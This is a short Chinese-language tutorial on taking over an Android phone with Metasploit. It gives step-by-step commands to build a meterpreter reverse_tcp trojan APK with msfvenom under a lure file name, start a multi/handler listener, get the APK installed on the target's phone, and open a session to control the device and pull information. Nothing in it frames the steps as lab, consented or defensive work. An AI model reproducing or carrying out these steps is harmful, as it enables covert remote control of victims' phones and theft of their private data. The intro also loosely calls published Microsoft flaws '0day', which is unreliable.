Msf 入侵安卓手机

MSF是Metasploit的简称，Metasploit是一款开源的安全漏洞检测工具，非常强大，分别有Windows版和Linux版，工具里集成了许多微软公布的漏洞(0day)。

1.查看ip

• ifconfig

2.生成木马

• msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ribenav.apk

3.然后进入Msf,启动msfconsole

• 命令：msfconsole

4.然后执行以下命令

• 命令：use exploit/multi/handler //加载模块
• 命令：set payload android/meterpreter/reverse_tcp //选择Payload
• 命令：set LHOST 192.168.0.109 //ip为kaili的ip ,即刚才生成木马的ip
• 命令：set LPORT 44444 //端口一定要与前面生成的木马的端口一致

5.将木马apk安装到目标手机上，然后输入以下命令

• 命令：exploit //开始执行漏洞，开始监听，等待手机上线

6.我们会发现有一个ID和本机处于连接状态，下面开始和ID为1的目标建立会话。

• sessions 1

7.这样对方的手机就就被我们控制了，之后便可以执行命令，获得想要的信息。可以输入help查看有哪些命令